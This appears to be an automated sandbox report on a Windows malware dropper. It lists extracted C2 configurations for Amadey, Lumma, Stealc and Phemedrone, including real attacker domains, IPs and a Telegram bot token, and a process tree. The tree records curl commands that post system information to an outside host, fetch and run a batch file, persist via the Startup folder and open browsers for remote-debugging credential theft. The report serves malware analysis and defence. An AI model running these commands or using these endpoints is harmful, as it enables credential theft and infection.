Analysis

  • max time kernel
    143s
  • max time network
    144s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11-12-2024 19:54

General

  • Target

    cf79430ad37eb42510fc89e6c3f167d8222cd151c4f3ef74c1e4261581125b10.exe

  • Size

    6.9MB

  • MD5

    1479664773606122cf9ca05067efc4e8

  • SHA1

    09ff5bc1f2298046d694afe64994942536f05373

  • SHA256

    cf79430ad37eb42510fc89e6c3f167d8222cd151c4f3ef74c1e4261581125b10

  • SHA512

    192c96a5c54463d89e7bdfd8e115e4b9e82e7f789149eaadd93045aa7c443d8b04b284df7719a6bb299b8bf0d7af2891157033e97e07ea0b39ab100abc325503

  • SSDEEP

    196608:RaWn9oLCm4BZrYrXUUQ3vN2xg1oRYYS1zTgdH:Nn9o2mSZEUUmQFCYS9

Malware Config

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

phemedrone

C2

https://api.telegram.org/bot7748267151:AAHJX2M4rJ5MRUvgJ9XqTgoOgAd1r_j9htM/sendDocument

Extracted

Family

lumma

C2

https://sordid-snaked.cyou/api

https://awake-weaves.cyou/api

https://wrathful-jammy.cyou/api

https://debonairnukk.xyz/api

https://diffuculttan.xyz/api

https://effecterectz.xyz/api

https://deafeninggeh.biz/api

https://immureprech.biz/api

https://tacitglibbr.biz/api

https://impend-differ.biz/api

https://print-vexer.biz/api

https://dare-curbys.biz/api

https://covery-mover.biz/api

https://formy-spill.biz/api

https://dwell-exclaim.biz/api

https://zinc-sneark.biz/api

https://se-blurry.biz/api

https://drive-connect.cyou/api

Extracted

Family

stealc

Botnet

stok

C2

http://185.215.113.206

Attributes
  • url_path

    /c4becf79229cb002.php

Extracted

Family

lumma

C2

https://tacitglibbr.biz/api

https://immureprech.biz/api

https://deafeninggeh.biz/api

https://effecterectz.xyz/api

https://diffuculttan.xyz/api

https://debonairnukk.xyz/api

https://wrathful-jammy.cyou/api

https://awake-weaves.cyou/api

https://sordid-snaked.cyou/api

https://drive-connect.cyou/api

https://covery-mover.biz/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Phemedrone

    An information and wallet stealer written in C#.

  • Phemedrone family
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 10 IoCs
  • Downloads MZ/PE file
  • Uses browser remote debugging 2 TTPs 8 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 20 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Executes dropped EXE 20 IoCs
  • Identifies Wine through registry keys 2 TTPs 10 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 2 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 30 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 7 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 8 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Modifies data under HKEY_USERS 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 49 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of FindShellTrayWindow 55 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\cf79430ad37eb42510fc89e6c3f167d8222cd151c4f3ef74c1e4261581125b10.exe
    "C:\Users\Admin\AppData\Local\Temp\cf79430ad37eb42510fc89e6c3f167d8222cd151c4f3ef74c1e4261581125b10.exe"
    1⤵
    • Adds Run key to start application
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2324
    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\V2M11.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\V2M11.exe
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3928
      • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\f5o42.exe
        C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\f5o42.exe
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4840
        • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1I15b7.exe
          C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1I15b7.exe
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:1844
          • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
            "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2520
            • C:\Users\Admin\AppData\Local\Temp\1013967001\jd5fvXs.exe
              "C:\Users\Admin\AppData\Local\Temp\1013967001\jd5fvXs.exe"
              6⤵
              • Checks computer location settings
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Checks processor information in registry
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:3804
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\1013967001\jd5fvXs.exe" & rd /s /q "C:\ProgramData\DBAI5X4OZU3E" & exit
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:1564
                • C:\Windows\SysWOW64\timeout.exe
                  timeout /t 10
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Delays execution with timeout.exe
                  PID:1612
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 3804 -s 2116
                7⤵
                • Program crash
                PID:4908
            • C:\Users\Admin\AppData\Local\Temp\1014031001\IGEaNGi.exe
              "C:\Users\Admin\AppData\Local\Temp\1014031001\IGEaNGi.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1896
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1896 -s 2284
                7⤵
                • Program crash
                PID:2548
            • C:\Users\Admin\AppData\Local\Temp\1014060001\ce0d1061c5.exe
              "C:\Users\Admin\AppData\Local\Temp\1014060001\ce0d1061c5.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2524
              • C:\Users\Admin\AppData\Local\Temp\1014060001\ce0d1061c5.exe
                "C:\Users\Admin\AppData\Local\Temp\1014060001\ce0d1061c5.exe"
                7⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:3336
            • C:\Users\Admin\AppData\Local\Temp\1014081001\M5iFR20.exe
              "C:\Users\Admin\AppData\Local\Temp\1014081001\M5iFR20.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              • Suspicious use of WriteProcessMemory
              PID:3852
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c systeminfo > tmp.txt && tasklist >> tmp.txt
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:1700
                • C:\Windows\SysWOW64\systeminfo.exe
                  systeminfo
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Gathers system information
                  PID:4144
                • C:\Windows\SysWOW64\tasklist.exe
                  tasklist
                  8⤵
                  • Enumerates processes with tasklist
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4748
              • C:\Windows\SysWOW64\curl.exe
                curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -X POST -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -H "X-Sec-Id: 0" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:4292
              • C:\Windows\SysWOW64\curl.exe
                curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -H "X-Sec-Id: 3" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:1896
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c type "C:\Users\Admin\AppData\Local\Temp\1014081001\M5iFR20.exe" > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe"
                7⤵
                • Drops startup file
                • System Location Discovery: System Language Discovery
                PID:4916
              • C:\Windows\SysWOW64\curl.exe
                curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:4060
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c "C:\Users\Admin\AppData\Local\Temp\tmp.bat" > C:\Users\Admin\AppData\Local\Temp\tmp.txt
                7⤵
                • System Location Discovery: System Language Discovery
                PID:5152
              • C:\Windows\SysWOW64\curl.exe
                curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -X POST -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:5320
            • C:\Users\Admin\AppData\Local\Temp\1014152001\a463830ef8.exe
              "C:\Users\Admin\AppData\Local\Temp\1014152001\a463830ef8.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:2808
            • C:\Users\Admin\AppData\Local\Temp\1014153001\d9bee0ff85.exe
              "C:\Users\Admin\AppData\Local\Temp\1014153001\d9bee0ff85.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:3968
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 3968 -s 1512
                7⤵
                • Program crash
                PID:4064
            • C:\Users\Admin\AppData\Local\Temp\1014154001\528adac973.exe
              "C:\Users\Admin\AppData\Local\Temp\1014154001\528adac973.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              PID:548
              • C:\Users\Admin\AppData\Local\Temp\1014154001\528adac973.exe
                "C:\Users\Admin\AppData\Local\Temp\1014154001\528adac973.exe"
                7⤵
                • Executes dropped EXE
                PID:3196
              • C:\Users\Admin\AppData\Local\Temp\1014154001\528adac973.exe
                "C:\Users\Admin\AppData\Local\Temp\1014154001\528adac973.exe"
                7⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:4120
        • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2o0784.exe
          C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2o0784.exe
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:2576
      • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3D67o.exe
        C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3D67o.exe
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Checks computer location settings
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Loads dropped DLL
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Checks processor information in registry
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:4636
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
          4⤵
          • Uses browser remote debugging
          • Enumerates system info in registry
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:2712
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffb4720cc40,0x7ffb4720cc4c,0x7ffb4720cc58
            5⤵
              PID:2436
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1860,i,8360962136900209684,7271568819112099035,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1856 /prefetch:2
              5⤵
                PID:5100
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2020,i,8360962136900209684,7271568819112099035,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2160 /prefetch:3
                5⤵
                  PID:2212
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1852,i,8360962136900209684,7271568819112099035,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2284 /prefetch:8
                  5⤵
                    PID:2964
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3196,i,8360962136900209684,7271568819112099035,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3216 /prefetch:1
                    5⤵
                    • Uses browser remote debugging
                    PID:1016
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3252,i,8360962136900209684,7271568819112099035,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3240 /prefetch:1
                    5⤵
                    • Uses browser remote debugging
                    PID:224
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4564,i,8360962136900209684,7271568819112099035,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4608 /prefetch:1
                    5⤵
                    • Uses browser remote debugging
                    PID:3964
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3200,i,8360962136900209684,7271568819112099035,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4908 /prefetch:8
                    5⤵
                      PID:972
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5040,i,8360962136900209684,7271568819112099035,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5060 /prefetch:8
                      5⤵
                        PID:4624
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5128,i,8360962136900209684,7271568819112099035,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4672 /prefetch:8
                        5⤵
                          PID:5248
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4960,i,8360962136900209684,7271568819112099035,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4744 /prefetch:8
                          5⤵
                            PID:5380
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4320,i,8360962136900209684,7271568819112099035,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5264 /prefetch:8
                            5⤵
                              PID:5428
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5396,i,8360962136900209684,7271568819112099035,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4552 /prefetch:8
                              5⤵
                                PID:5804
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5360,i,8360962136900209684,7271568819112099035,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4668 /prefetch:2
                                5⤵
                                • Uses browser remote debugging
                                PID:5504
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
                              4⤵
                              • Uses browser remote debugging
                              • Enumerates system info in registry
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                              • Suspicious use of FindShellTrayWindow
                              PID:5996
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffb472146f8,0x7ffb47214708,0x7ffb47214718
                                5⤵
                                • Checks processor information in registry
                                • Enumerates system info in registry
                                • Suspicious behavior: EnumeratesProcesses
                                PID:6008
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1928,15467607810540298429,15493078261132162689,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1980 /prefetch:2
                                5⤵
                                  PID:1532
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1928,15467607810540298429,15493078261132162689,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 /prefetch:3
                                  5⤵
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:4132
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1928,15467607810540298429,15493078261132162689,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2256 /prefetch:8
                                  5⤵
                                    PID:5180
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1928,15467607810540298429,15493078261132162689,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2268 /prefetch:2
                                    5⤵
                                      PID:5152
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=1928,15467607810540298429,15493078261132162689,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3236 /prefetch:1
                                      5⤵
                                      • Uses browser remote debugging
                                      PID:5296
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=1928,15467607810540298429,15493078261132162689,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3244 /prefetch:1
                                      5⤵
                                      • Uses browser remote debugging
                                      PID:1564
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1928,15467607810540298429,15493078261132162689,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2272 /prefetch:2
                                      5⤵
                                        PID:5316
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
